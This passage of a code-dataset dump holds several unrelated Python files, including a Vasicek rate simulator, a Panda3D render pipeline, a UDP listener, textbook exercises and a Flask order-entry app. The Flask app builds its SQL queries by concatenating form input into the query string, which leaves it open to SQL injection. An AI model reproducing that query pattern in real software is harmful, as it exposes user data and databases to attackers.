\"r\", encoding=\"utf-8-sig\") as file:\r\n for line in file:\r\n word_list.append(line.strip('\\n'))\r\n word = random.choice(word_list)\r\n return word\r\n\r\nrand_word = random_word()\r\n\r\n#Socket to talk to server\r\nprint(\"\\nDisclosure: Your information is private and will not be recorded\")\r\nprint(\"(If the generator is not working you can also go to https://dadjokegenerator.com/)\\n\")\r\nprint(\"Your Random Dad Joke is:\")\r\nsocket = context.socket(zmq.REQ)\r\nsocket.connect(\"tcp://localhost:5555\")\r\n\r\nfrom dadjokes import Dadjoke\r\ndadjoke = Dadjoke()\r\nprint(dadjoke.joke)\r\n\r\nsocket.send_string(rand_word)\r\n\r\n# Get the reply.\r\nmessage = socket.recv()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TeresitaCGNader/CS-361-group-project","sub_path":"receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21766114341","text":"from typing import Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PyCurve.curve import Curve\n\nfrom PyCurve.simulation import Simulation\n\n\n\n\nclass Vasicek:\n\n def __init__(self, alpha: float, beta: float, sigma: float, rt: float, time: float, delta_time: float) -> None:\n self._alpha = alpha\n self._beta = beta\n self._sigma = sigma\n self._rt = rt\n self._dt = delta_time\n self._steps = int(time / delta_time)\n\n def get_attr(self, attr: str) -> Union[float, int]:\n return self.__getattribute__(attr)\n\n def _sigma_part(self, n: int) -> float:\n return self.get_attr(\"_sigma\") * np.sqrt(self.get_attr(\"_dt\")) * np.random.normal(size=n)\n\n def _mu_dt(self, rt: np.ndarray) -> float:\n return self.get_attr(\"_alpha\") * (self.get_attr(\"_beta\") - rt) * self.get_attr(\"_dt\")\n\n def simulate_paths(self, n: int) -> np.array:\n simulation = np.zeros(shape=(self.get_attr(\"_steps\"), n))\n simulation[0, :] = self._rt\n for i in range(1, self.get_attr(\"_steps\"), 1):\n dr = self._mu_dt(simulation[i - 1, :]) + self._sigma_part(n)\n simulation[i, :] = simulation[i - 1, :] + dr\n return Simulation(simulation, self.get_attr(\"_dt\"))\n\n @staticmethod\n def plot_calibrated(simul: Simulation, instantaneous_forward: Curve) -> None:\n fig = plt.figure(figsize=(12.5, 8))\n fig.suptitle(\"Model Fitting Curve T=0\")\n fig.canvas.set_window_title('Model Fitting Curve T=0')\n ax1 = fig.add_subplot(111)\n ax1.set_xlabel('t, years')\n ax1.set_ylabel('Yield')\n ax1.plot(np.linspace(1, simul.get_steps, simul.get_steps) * simul.get_dt,\n simul.get_sim, lw=0.5)\n ax1.plot(np.linspace(1, simul.get_steps, simul.get_steps) * simul.get_dt,\n simul.yield_curve().get_rate, lw=3, c=\"Navy\", label=\"Vasicek Term Structure\")\n ax1.plot(instantaneous_forward.get_time, instantaneous_forward.get_rate, c=\"darkred\",\n label=\"Initial Term Structure\", lw=3)\n plt.legend()\n plt.show()\n return fig\n","repo_name":"ahgperrin/PyCurve","sub_path":"src/PyCurve/vasicek.py","file_name":"vasicek.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"20954320757","text":"def merge(x, y):\n z = x + y\n # first variant works but not good\n # flag = False\n # while not flag:\n # flag = True\n # for i in range(len(z) - 1):\n # if z[i] > z[i + 1]:\n # flag = False\n # (z[i], z[i + 1]) = (z[i + 1], z[i])\n # second variant\n i = j = 0\n for k in range(len(z)):\n if i > len(x) - 1:\n z[k] = y[j]\n j += 1\n elif j > len(y) - 1:\n z[k] = x[i]\n i += 1\n elif x[i] < y[j]:\n z[k] = x[i]\n i += 1\n else:\n z[k] = y[j]\n j += 1\n return z\n\n\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nc = merge(a, b)\nprint(*c)\n","repo_name":"dlogushiv/courseraBasePythonCourse","sub_path":"Week-6/1-JoinLists.py","file_name":"1-JoinLists.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43563534189","text":"import sys\nimport time\n\nfrom 
panda3d.core import LVecBase2i, TransformState, RenderState, load_prc_file\nfrom panda3d.core import PandaSystem\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.stdpy.file import isfile, open\n\nfrom .Globals import Globals\nfrom .PipelineExtensions import PipelineExtensions\nfrom .CommonResources import CommonResources\nfrom .CommonStages import CommonStages\nfrom .Native import TagStateManager\nfrom .RenderTarget import RenderTarget\n\nfrom .Util.DebugObject import DebugObject\nfrom .Util.SettingsLoader import SettingsLoader\nfrom .Util.NetworkUpdateListener import NetworkUpdateListener\nfrom .GUI.OnscreenDebugger import OnscreenDebugger\nfrom .Effects.EffectLoader import EffectLoader\nfrom .PluginInterface.PluginManager import PluginManager\nfrom .DayTime.DayTimeManager import DayTimeManager\n\nfrom .Managers.MountManager import MountManager\nfrom .Managers.StageManager import StageManager\nfrom .Managers.LightManager import LightManager\nfrom .Managers.IESProfileManager import IESProfileManager\n\nclass RenderPipeline(PipelineExtensions, DebugObject):\n\n \"\"\" This is the main pipeline logic, it combines all components of the\n pipeline to form a working system. It does not do much work itself, but\n instead setups all the managers and systems to be able to do their work.\n\n It also derives from RPExtensions to provide some useful functions like\n creating a default skybox or loading effect files. \"\"\"\n\n def __init__(self, showbase):\n \"\"\" Creates a new pipeline with a given showbase instance. This should\n be done before intializing the ShowBase, the pipeline will take care of\n that. \"\"\"\n DebugObject.__init__(self, \"RenderPipeline\")\n self.debug(\"Using Python {} with architecture {}\".format(\n sys.version_info.major, PandaSystem.get_platform()))\n self._showbase = showbase\n self._mount_mgr = MountManager(self)\n self._settings = SettingsLoader(self, \"Pipeline Settings\")\n self.set_default_loading_screen()\n\n def load_settings(self, path):\n \"\"\" Loads the pipeline configuration from a given filename. Usually\n this is the 'Config/pipeline.ini' file. If you call this more than once,\n only the settings of the last file will be used. \"\"\"\n self._settings.load_from_file(path)\n\n def get_setting(self, setting_name):\n \"\"\" Returns a handle to the settings, returns an empty PipelineSettings\n object if no settings have been loaded so far. \"\"\"\n return self._settings[setting_name]\n\n def reload_shaders(self):\n \"\"\" Reloads all shaders \"\"\"\n self.debug(\"Reloading shaders ..\")\n self._debugger.get_error_msg_handler().clear_messages()\n self._debugger.set_reload_hint_visible(True)\n self._showbase.graphicsEngine.render_frame()\n self._showbase.graphicsEngine.render_frame()\n\n self._tag_mgr.cleanup_states()\n self._stage_mgr.set_shaders()\n self._light_mgr.reload_shaders()\n\n # Set the default effect on render and trigger the reload hook\n self.set_effect(Globals.render, \"Effects/Default.yaml\", {}, -10)\n self._plugin_mgr.trigger_hook(\"on_shader_reload\")\n self._debugger.set_reload_hint_visible(False)\n\n def create(self):\n \"\"\" This creates the pipeline, and setups all buffers. It also\n constructs the showbase. The settings should have been loaded before\n calling this, and also the base and write path should have been\n initialized properly (see MountManager). 
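The total initialization time is measured and logged in\n        milliseconds at the end of this call. 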
\"\"\"\n\n start_time = time.time()\n\n if not self._mount_mgr.is_mounted:\n self.debug(\"Mount manager was not mounted, mounting now ...\")\n self._mount_mgr.mount()\n\n if not self._settings.is_file_loaded():\n self.debug(\"No settings loaded, loading from default location\")\n self._settings.load_from_file(\"$$Config/pipeline.yaml\")\n\n # Check if the pipeline was properly installed, before including anything else\n if not isfile(\"Data/install.flag\"):\n DebugObject.global_error(\"CORE\", \"You didn't setup the pipeline yet! Please run setup.py.\")\n sys.exit(1)\n\n # Load the default prc config\n load_prc_file(\"$$Config/configuration.prc\")\n\n # Construct the showbase and init global variables\n ShowBase.__init__(self._showbase)\n self._init_globals()\n\n # Create the loading screen\n self._loading_screen.create()\n self._adjust_camera_settings()\n self._create_managers()\n\n # Init the onscreen debugger\n self._init_debugger()\n\n # Load plugins and daytime settings\n self._plugin_mgr.load_plugins()\n self._daytime_mgr.load_settings()\n self._com_resources.write_config()\n\n # Setup common defines\n self._create_common_defines()\n\n # Let the plugins setup their stages\n self._plugin_mgr.trigger_hook(\"on_stage_setup\")\n self._setup_managers()\n self._plugin_mgr.trigger_hook(\"on_pipeline_created\")\n\n # Set the default effect on render\n self.set_effect(Globals.render, \"Effects/Default.yaml\", {}, -10)\n\n # Hide the loading screen\n self._loading_screen.remove()\n\n self._start_listener()\n\n # Measure how long it took to initialize everything\n init_duration = int((time.time() - start_time) * 1000.0)\n self.debug(\"Finished initialization in {} ms\".format(init_duration))\n\n def _create_managers(self):\n \"\"\" Internal method to create all managers and instances\"\"\"\n self._tag_mgr = TagStateManager(Globals.base.cam)\n self._plugin_mgr = PluginManager(self)\n self._effect_loader = EffectLoader()\n self._stage_mgr = StageManager(self)\n self._light_mgr = LightManager(self)\n self._daytime_mgr = DayTimeManager(self)\n self._ies_profile_mgr = IESProfileManager(self)\n\n # Load commonly used resources\n self._com_resources = CommonResources(self)\n self._com_stages = CommonStages(self)\n\n def _setup_managers(self):\n \"\"\" Internal method to setup all managers \"\"\"\n self._stage_mgr.setup()\n self._stage_mgr.set_shaders()\n self._light_mgr.reload_shaders()\n self._init_bindings()\n self._light_mgr.init_shadows()\n\n def _init_debugger(self):\n \"\"\" Internal method to initialize the GUI-based debugger \"\"\"\n if self.get_setting(\"pipeline.display_debugger\"):\n self._debugger = OnscreenDebugger(self)\n else:\n # Use an empty onscreen debugger in case the debugger is not\n # enabled, which defines all member functions as empty lambdas\n class _empty_class(object):\n def __getattr__(self, *args, **kwargs):\n return lambda *args, **kwargs: None\n self._debugger = _empty_class()\n\n def _init_globals(self):\n \"\"\" Inits all global bindings \"\"\"\n Globals.load(self._showbase)\n Globals.resolution = LVecBase2i(\n self._showbase.win.get_x_size(),\n self._showbase.win.get_y_size())\n\n # Connect the render target output function to the debug object\n RenderTarget.RT_OUTPUT_FUNC = lambda *args: DebugObject.global_warn(\n \"RenderTarget\", *args[1:])\n\n def _init_bindings(self):\n \"\"\" Inits the tasks and keybindings \"\"\"\n \n # Add a hotkey to reload the shaders, but only if the debugger is enabled\n if self.get_setting(\"pipeline.display_debugger\"):\n 
self._showbase.accept(\"r\", self.reload_shaders)\n \n self._showbase.addTask(self._manager_update_task, \"RP_UpdateManagers\", sort=10)\n self._showbase.addTask(self._plugin_pre_render_update, \"RP_Plugin_BeforeRender\", sort=12)\n self._showbase.addTask(self._plugin_post_render_update, \"RP_Plugin_AfterRender\", sort=1000)\n self._showbase.taskMgr.doMethodLater(0.5, self._clear_state_cache, \"RP_ClearStateCache\")\n\n def _clear_state_cache(self, task=None):\n \"\"\" Task which repeatedly clears the state cache to avoid storing\n unused states. \"\"\"\n task.delayTime = 1.0\n TransformState.clear_cache()\n RenderState.clear_cache()\n return task.again\n\n def _start_listener(self):\n \"\"\" Starts a listener thread which listens for incoming connections to\n trigger a shader reload. This is used by the Plugin Configurator to dynamically\n update settings. \"\"\"\n self._listener = NetworkUpdateListener(self)\n self._listener.setup()\n\n def _manager_update_task(self, task):\n \"\"\" Update task which gets called before the rendering \"\"\"\n self._listener.update()\n self._debugger.update()\n self._daytime_mgr.update()\n self._com_resources.update()\n self._stage_mgr.update()\n self._light_mgr.update()\n return task.cont\n\n def _plugin_pre_render_update(self, task):\n \"\"\" Update task which gets called before the rendering, and updates the\n plugins. This is a seperate task to split the work, and be able to do\n better performance analysis \"\"\"\n self._plugin_mgr.trigger_hook(\"pre_render_update\")\n return task.cont\n\n def _plugin_post_render_update(self, task):\n \"\"\" Update task which gets called after the rendering \"\"\"\n self._plugin_mgr.trigger_hook(\"post_render_update\")\n return task.cont\n\n def _create_common_defines(self):\n \"\"\" Creates commonly used defines for the shader auto config \"\"\"\n define = self._stage_mgr.define\n\n # 3D viewport size\n define(\"WINDOW_WIDTH\", Globals.resolution.x)\n define(\"WINDOW_HEIGHT\", Globals.resolution.y)\n\n # Pass camera near and far plane\n define(\"CAMERA_NEAR\", round(Globals.base.camLens.get_near(), 5))\n define(\"CAMERA_FAR\", round(Globals.base.camLens.get_far(), 5))\n\n # Work arround buggy nvidia driver, which expects arrays to be const\n if \"NVIDIA 361.43\" in self._showbase.win.get_gsg().get_driver_version():\n define(\"CONST_ARRAY\", \"const\")\n else:\n define(\"CONST_ARRAY\", \"\")\n\n # Provide driver vendor as a default\n vendor = self._showbase.win.get_gsg().get_driver_vendor().lower()\n if \"nvidia\" in vendor:\n define(\"IS_NVIDIA\", 1)\n if \"ati\" in vendor:\n define(\"IS_AMD\", 1)\n if \"intel\" in vendor:\n define(\"IS_INTEL\", 1)\n\n self._light_mgr.init_defines()\n self._plugin_mgr.init_defines()\n\n def _adjust_camera_settings(self):\n \"\"\" Sets the default camera settings \"\"\"\n self._showbase.camLens.set_near_far(0.1, 70000)\n self._showbase.camLens.set_fov(90)\n\n def _get_mount_mgr(self):\n \"\"\" Returns a handle to the mount manager. This can be used for setting\n the base path and also modifying the temp path. See the MountManager\n documentation for further information. \"\"\"\n return self._mount_mgr\n\n def _get_stage_mgr(self):\n \"\"\" Returns a handle to the stage manager object. The stage manager\n manages all RenderStages, shader inputs and defines, and also writing\n of the shader auto config.\"\"\"\n return self._stage_mgr\n\n def _get_plugin_mgr(self):\n \"\"\" Returns a handle to the plugin manager, this can be used to trigger\n hooks. 
It also stores information about the loaded plugins. \"\"\"\n        return self._plugin_mgr\n\n    def _get_light_mgr(self):\n        \"\"\" Returns a handle to the light manager, this usually should not be used\n        by the user, instead use add_light and remove_light. \"\"\"\n        return self._light_mgr\n\n    def _get_tag_mgr(self):\n        \"\"\" Returns a handle to the tag state manager \"\"\"\n        return self._tag_mgr\n\n    def _get_daytime_mgr(self):\n        \"\"\" Returns a handle to the DayTime manager \"\"\"\n        return self._daytime_mgr\n\n    # Manager properties\n    mount_mgr = property(_get_mount_mgr)\n    stage_mgr = property(_get_stage_mgr)\n    plugin_mgr = property(_get_plugin_mgr)\n    light_mgr = property(_get_light_mgr)\n    tag_mgr = property(_get_tag_mgr)\n    daytime_mgr = property(_get_daytime_mgr)\n","repo_name":"MYheavyGo/RenderPipeline","sub_path":"Code/RenderPipeline.py","file_name":"RenderPipeline.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"5005179015","text":"#!/usr/bin/env python\n\nimport socket\n\nclass UDP_connect:\n    def __init__(self, ip, port, buffersize):\n        self._ip = ip\n        self._port = port\n        self._buffersize = buffersize\n\n        self._UDPServerSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n        self._UDPServerSocket.bind((self._ip, self._port))\n\n    def get_message(self):\n        bytesAddressPair = self._UDPServerSocket.recvfrom(self._buffersize)\n        message = bytesAddressPair[0]\n        address = bytesAddressPair[1]\n\n        return [message, address]","repo_name":"kimhaafi/FRTF20-bluelining-maxIV","sub_path":"src/UDP_connection.py","file_name":"UDP_connection.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71566408440","text":"\nfrom flask import Flask, render_template, request, jsonify, json, redirect, url_for\napp = Flask(__name__)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\nimport pypyodbc\nimport db_connection as dbConn\nfrom create import Create\nimport webbrowser\nimport sys\n\n@app.route('/', methods=['POST','GET'])\n@app.route('/python', methods=['POST','GET'])\ndef python():\n    try:\n        if request.method == 'POST':\n            name = request.form.get('user')\n            client = request.form.get('client')\n            token = request.form.get('token')\n            if not name or not token:\n                return render_template('Unauthorized.html')\n            print(token)\n            conn = dbConn.getConnection()\n            cursor = conn.cursor()\n            # Parameterized (qmark-style) queries avoid SQL injection with pypyodbc.\n            cursor.execute(\"SELECT Token FROM UserMaster WHERE UserName = ?\", (name,))\n            valids = cursor.fetchone()\n\n            if valids is not None and token == valids[0]:\n                cursor.execute(\"SELECT * FROM SaleOrder WHERE Client = ?\", (client,))\n                data = cursor.fetchall()\n                print(data)\n                for row in data:\n                    OrderNo = row[0]\n                    Name = row[1]\n                    Mobile = row[2]\n                    Client = row[3]\n                return render_template('Info.html', name=name, data=data)\n            else:\n                return render_template('Unauthorized.html')\n    except Exception as e:\n        # sys.exit() takes a single argument; log and return an error page instead.\n        print('error:', e)\n        return render_template(\"Unauthorized.html\")\n\n\n@app.route('/additem')\ndef additem():\n    return render_template(\"NewOrder.html\")\n\n@app.route('/insertorder', methods=['POST','GET'])\ndef insertorder():\n    try:\n        conn = dbConn.getConnection()\n        cursor = conn.cursor()\n        if request.method == \"POST\":\n            order = request.form['neworder']\n            custname = request.form['cname']\n            mobile = request.form['phn']\n            allclients = 
request.form['clints']\n            #if (order == None or order == '' or custname == None or custname == '' or mob == None or mob == ''):\n            #else:\n            # Qmark placeholders match the pypyodbc paramstyle.\n            query = \"INSERT INTO SaleOrder(Order_No,Customer_Name,Mobile_No,Client) VALUES(?,?,?,?)\"\n            cursor.execute(query, (order, custname, mobile, allclients))\n            conn.commit()\n            return redirect(url_for('python'))\n\n    except Exception as e:\n        # sys.exit() takes a single argument; log and redirect instead.\n        print('error:', e)\n        return redirect(url_for('python'))\n\nif __name__ == '__main__':\n    app.run(debug=True, port=5000)\n    #return json.dumps({'status':'OK','user':custname,'pass':allclients})\n    #return redirect(url_for('home'))\n    #return redirect(url_for('https://localhost:44384/Home.aspx'));\n\n\n#def clearAll():\n\n\n#@app.route('/back', methods=['POST', 'GET'])\n#def back():\n#    try:\n#        if request.methods == 'POST':\n#            return redirect('Info.html');\n#        #else:\n#        #    return redirect('Info.html');\n#    except Exception as e:\n#        sys.exit('error', e)\n\n\n#@app.route('/resources', methods=['GET','POST'])\n#def resources():\n#    try:\n#        if request.method == 'POST':\n#            Data = request.form.get(\"dt\")\n#    except Exception as e:\n#        print(e)\n#    return render_template('Data.html', Data=Data)\n\n\n\n\n#@app.route('/ajaxfile', methods=[\"POST\",\"GET\"])\n#def ajaxfile():\n#    try:\n#        ncl = client\n#        conn = dbConn.getConnection()\n#        cursor = conn.cursor()\n\n#    except Exception as e:\n#        sys.exit('error', e)\n\n    #cur = conn.cursor()\n    #cur.execute(\"Select * from SaleOrder where Client='\"+ncl+\"'\")\n    #data = cur.fetchall()\n    \n    #for row in data:\n    #    OrderNo = row[0]\n    #    Name = row[1]\n    #    Mobile = row[2]\n    #    Client = row[3]\n    #return render_template('Info.html', data=data);\n    #try:\n    #    conn = dbConn.getConnection()\n    #    cursor = conn.cursor()\n    #    if request.method == 'POST':\n    #        draw = request.form['draw'] \n    #        row = int(request.form['start'])\n    #        rowperpage = int(request.form['length'])\n    #        searchValue = request.form[\"search[value]\"]\n    #        print(draw)\n    #        print(row)\n    #        print(rowperpage)\n    #        print(searchValue)\n    \n    #        ## Total number of records without filtering\n    #        cursor.execute(\"select count(*) as allcount from test\")\n    #        rsallcount = cursor.fetchone()\n    #        totalRecords = rsallcount['allcount']\n    #        print(totalRecords) \n    \n    #        ## Total number of records with filtering\n    #        likeString = \"%\" + searchValue +\"%\"\n    #        cursor.execute(\"SELECT count(*) as allcount from test WHERE name LIKE %s OR position LIKE %s OR office LIKE %s\", (likeString, likeString, likeString))\n    #        rsallcount = cursor.fetchone()\n    #        totalRecordwithFilter = rsallcount['allcount']\n    #        print(totalRecordwithFilter) \n    \n    #        ## Fetch records\n    #        if searchValue=='':\n    #            cursor.execute(\"SELECT * FROM test ORDER BY name asc limit %s, %s;\", (row, rowperpage))\n    #            employeelist = cursor.fetchall()\n    #        else:\n    #            cursor.execute(\"SELECT * FROM test WHERE name LIKE %s OR position LIKE %s OR office LIKE %s limit %s, %s;\", (likeString, likeString, likeString, row, rowperpage))\n    #            employeelist = cursor.fetchall()\n    #        print(employeelist)\n    \n    #        data = []\n    #        for row in employeelist:\n    #            data.append({\n    #                'name': row['Name'],\n    #                'products': row['Client'],\n    #                #'age': row['age'],\n    #                #'salary': row['salary'],\n    #                #'office': row['office'],\n    #            })\n    \n    #        response = {\n    #            'draw': draw,\n    #            'iTotalRecords': 3,\n    #            'iTotalDisplayRecords': 3,\n    #            'aaData': data,\n    #        }\n    #        return jsonify(response)\n    #except Exception as e:\n    #    print(e)\n    #finally:\n    #    cursor.close()\n    # 
conn.close()\n\n\n\n\n","repo_name":"deepakt830/Data-Share","sub_path":"PythonApplication1/FlaskWebProject3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43185255478","text":"# Python Crash Course, Eric Matthes, no starch press\r\n# Ch8 Functions\r\n# Textbook Exercises\r\n\r\n# Louis Lozano\r\n# 3-20-2019\r\n# 8-10_great_magicians.py\r\n\r\n# Description: This program uses a function to take a list of magicians\r\n# and print their names one by one. Then it uses another function to\r\n# add 'the Great' to each name. The list is printed again to show it's\r\n# been modified.\r\n\r\n# Defines a function that takes a list of magician names and prints each\r\n# one in order. \r\ndef show_magicians(magicians):\r\n for magician in magicians:\r\n print(magician)\r\n\r\n# Defines a function that takes the list of magician and adds ' the Great'\r\n# to their name.\r\ndef make_great(magicians):\r\n # Empty list to hold great magicians\r\n great_magicians = []\r\n\r\n # while loop to add ' the Great' to each magicians name while moving\r\n # them to a new list\r\n while magicians:\r\n magician = magicians.pop()\r\n great_magician = magician + ' the Great'\r\n great_magicians.append(great_magician)\r\n\r\n # 'magicians = great_magicians' does not work.\r\n\r\n # Puts each magician back into the original list.\r\n for great_magician in great_magicians:\r\n magicians.append(great_magician)\r\n\r\n# Defines a list of magicians.\r\nmagicians = ['David', 'Chris', 'Penn', 'Teller', 'Strange']\r\n\r\n# Calls function with the list of magicians.\r\nshow_magicians(magicians)\r\n\r\n# Makes each magician great\r\nmake_great(magicians)\r\n\r\nprint('\\n')\r\n# Calls function with the modified list of magicians.\r\nshow_magicians(magicians)\r\n","repo_name":"louloz/Python-Crash-Course","sub_path":"Ch8_Functions/8-10_great_magicians.py","file_name":"8-10_great_magicians.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27189119519","text":"import requests\nimport os\nimport zipfile\n\nfrom ..getFiles import *\n\ndef test_DownloadPlantVillageCroppedSegmentedDataset():\n tomato_dataset_url = \"http://faridnakhle.com/pv/tomato-split-cropped-segmented-balanced.zip\"\n save_tomato_dataset_to = \"/content/dataset/tomato-dataset/\"\n save_tomato_dataset_as = \"tomato-split-cropped-segmented-balanced.zip\"\n DownloadPlantVillageCroppedSegmentedDataset(tomato_dataset_url, save_tomato_dataset_to, save_tomato_dataset_as)\n mainPathCreated = os.path.exists(save_tomato_dataset_to)\n train_dir = save_tomato_dataset_to + \"train\"\n val_dir = save_tomato_dataset_to + \"val\"\n test_dir = save_tomato_dataset_to + \"test\"\n trainPathExists = os.path.exists(train_dir)\n valPathExists = os.path.exists(val_dir)\n testPathExists = os.path.exists(test_dir)\n \n train_classes = [path for path in os.listdir(train_dir)]\n train_imgs = dict([(ID, os.listdir(os.path.join(train_dir, ID))) for ID in train_classes])\n train_classes_count = []\n train_file_count = 0\n for trainClass in train_classes:\n train_classes_count.append(len(train_imgs[trainClass]))\n train_file_count = train_file_count + len(train_imgs[trainClass])\n\n val_classes = [path for path in os.listdir(val_dir)]\n val_imgs = dict([(ID, os.listdir(os.path.join(val_dir, ID))) for ID in val_classes])\n val_classes_count = []\n val_file_count 
= 0\n for valClass in val_classes:\n val_classes_count.append(len(val_imgs[valClass]))\n val_file_count = val_file_count + len(val_imgs[valClass])\n\n test_classes = [path for path in os.listdir(test_dir)]\n test_imgs = dict([(ID, os.listdir(os.path.join(test_dir, ID))) for ID in test_classes])\n test_classes_count = []\n test_file_count = 0\n for testClass in test_classes:\n test_classes_count.append(len(test_imgs[testClass]))\n test_file_count = test_file_count + len(test_imgs[testClass])\n\n \n assert mainPathCreated == True\n assert trainPathExists == True\n assert valPathExists == True\n assert testPathExists == True\n assert train_file_count == 15228\n assert val_file_count == 1812\n assert test_file_count == 1825\n\n\ndef test_DownloadPretrainedDCNNDenseNet161TomatoModel():\n tomato_densenet161_model_url = \"http://faridnakhle.com/pv/models/RSGAI_DenseNet.zip\"\n save_densenet_model_to = \"/content/models/\"\n save_densenet_model_as = \"densenet.zip\"\n DENSENET_PRETRAINED_PATH ='/content/models/RSGAI_DenseNet.pth'\n DownloadPretrainedDCNNDenseNet161TomatoModel(tomato_densenet161_model_url, save_densenet_model_to, save_densenet_model_as)\n assert os.path.exists(save_densenet_model_to) == True\n assert os.path.isfile(DENSENET_PRETRAINED_PATH) == True","repo_name":"HarfoucheLab/Ready-Steady-Go-AI","sub_path":"Step 3 - Data Analysis/py/libs/tests/test_GetFiles.py","file_name":"test_GetFiles.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"24484249199","text":"# 5-10. Checking Usernames: Do the following to create a program that simulates \n# how websites ensure that everyone has a unique username.\n# •\t Make a list of five or more usernames called current_users.\n# •\t Make another list of five usernames called new_users. Make sure one or \n# two of the new usernames are also in the current_users list.\n# •\t Loop through the new_users list to see if each new username has already \n# been used. If it has, print a message that the person will need to enter a \n# new username. If a username has not been used, print a message saying \n# that the username is available.\n# •\t Make sure your comparison is case insensitive. If 'John' has been used, \n# 'JOHN' should not be accepted. (To do this, you’ll need to make a copy of \n# current_users containing the lowercase versions of all existing users.\n\ncurrentUsers = [\"ankit\", \"punkit\", \"sunkit\", \"aniket\"]\nnewUsers = []\n\nwhile(True):\n temp = input(\"Enter username: \").lower()\n if(temp == \"\" or temp == None):\n break\n else:\n newUsers.append(temp)\n\nprint()\nif(len(newUsers) != 0):\n for name in newUsers:\n if(name in currentUsers):\n print(f\"Username '{name}' already exist\\n\" + \n \"Please enter a new username\\n\")\n else:\n print(f\"Username '{name}' is available\\n\")\nelse:\n print(\"Bruh! 
no users\\nWe need some new users\")","repo_name":"ankitminz/python-crash-course-2nd-edition-solutions","sub_path":"Ch5/Ch5Q10/CheckingUsernames.py","file_name":"CheckingUsernames.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72878977079","text":"\"\"\"\nExample 6\n---------\nThis example shows how to compute a series of values describing a ballistic\ndescent.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom casex import BallisticDescent2ndOrderDragApproximation, enums, AircraftSpecs, AnnexFParms\n\n\n# Instantiate necessary classes.\nBDM = BallisticDescent2ndOrderDragApproximation()\n\n# Set aircraft values.\naircraft_type = enums.AircraftType.FIXED_WING\nwidth = 2.8\nmass = 90\n\n# Instantiate and add data to AircraftSpecs class.\naircraft = AircraftSpecs(aircraft_type, width, mass)\naircraft.set_ballistic_drag_coefficient(0.8)\naircraft.set_ballistic_frontal_area(0.6 * 0.6)\nBDM.set_aircraft(aircraft)\n\n# Set initial values for the descent.\naltitude = 100\ninitial_velocity_x = 28\ninitial_velocity_y = 0\n\n# Compute ballistic descent values.\n# Note that the return in p contains numerous different values.\np = BDM.compute_ballistic_distance(altitude, initial_velocity_x, initial_velocity_y)\n\nprint(\"Distance: {:1.1f} m \".format(p[0]))\nprint(\"Impact speed: {:1.1f} m/s\".format(p[1]))\nprint(\"Angle: {:1.1f} degs\".format(p[2] * 180 / np.pi))\nprint(\"Time : {:1.2f} s\".format(p[3]))\nprint(\"Distances: {:1.3f} {:1.3f} {:1.3f}\".format(BDM.distance1, BDM.distance2, BDM.distance3))\nprint(\"Times: {:1.3f} {:1.3f} {:1.3f}\".format(BDM.time_top, BDM.time_cross, BDM.time_impact))\nprint(\"Speeds: {:1.3f} {:1.3f}\".format(BDM.velocity_x, BDM.velocity_y))\nprint(\"\")\n\n# In the following, there are three examples, where horizontal velocity (first example), vertical velocity\n# (second example), and drag coefficient (third example) are arrays rather than scalar.\naltitude = 150\ninitial_velocity_x = np.linspace(0, 80, 100)\ninitial_velocity_y = np.linspace(-10, 10, 100)\n\nBDM.set_aircraft(aircraft)\n\n# Array for horizontal velocity and vertical velocity.\np_vel_x = BDM.compute_ballistic_distance(altitude, initial_velocity_x, -2)\np_vel_y = BDM.compute_ballistic_distance(altitude, 30, initial_velocity_y)\n\n# Array for drag coefficient.\ndrag_coef = np.linspace(0.7, 1, 100)\naircraft.set_ballistic_drag_coefficient(drag_coef)\nBDM.set_aircraft(aircraft)\np_drag_coef = BDM.compute_ballistic_distance(altitude, 30, -2)\n\n# Set up figure.\nfig, ax = plt.subplots(2, 2, figsize=(12, 6))\nplt.style.use('fivethirtyeight')\n\nax[0, 0].plot(initial_velocity_x, p_vel_x[0], linewidth=2)\nax[0, 0].set_xlabel('Initial velocity X [m/s]', fontsize=12)\nax[0, 0].set_ylabel('Impact distance [m]', fontsize=12)\nax[0, 0].set_title('Impact distance for varying initial horizontal velocity', fontsize=14)\n\nax[0, 1].plot(initial_velocity_y, p_vel_y[1], linewidth=2)\nax[0, 1].set_xlabel('Initial velocity Y [m/s]', fontsize=12)\nax[0, 1].set_ylabel('Impact velocity [m/s]', fontsize=12)\nax[0, 1].set_title('Impact distance for varying initial vertical velocity', fontsize=14)\n\nax[1, 0].plot(drag_coef, p_drag_coef[2] * 180 / np.pi, linewidth=2)\nax[1, 0].set_xlabel('Drag coefficient [-]', fontsize=12)\nax[1, 0].set_ylabel('Angle [deg]', fontsize=12)\nax[1, 0].set_title('Impact angle for varying drag coefficient', fontsize=14)\n\nax[1, 1].plot(initial_velocity_y, p_drag_coef[3], 
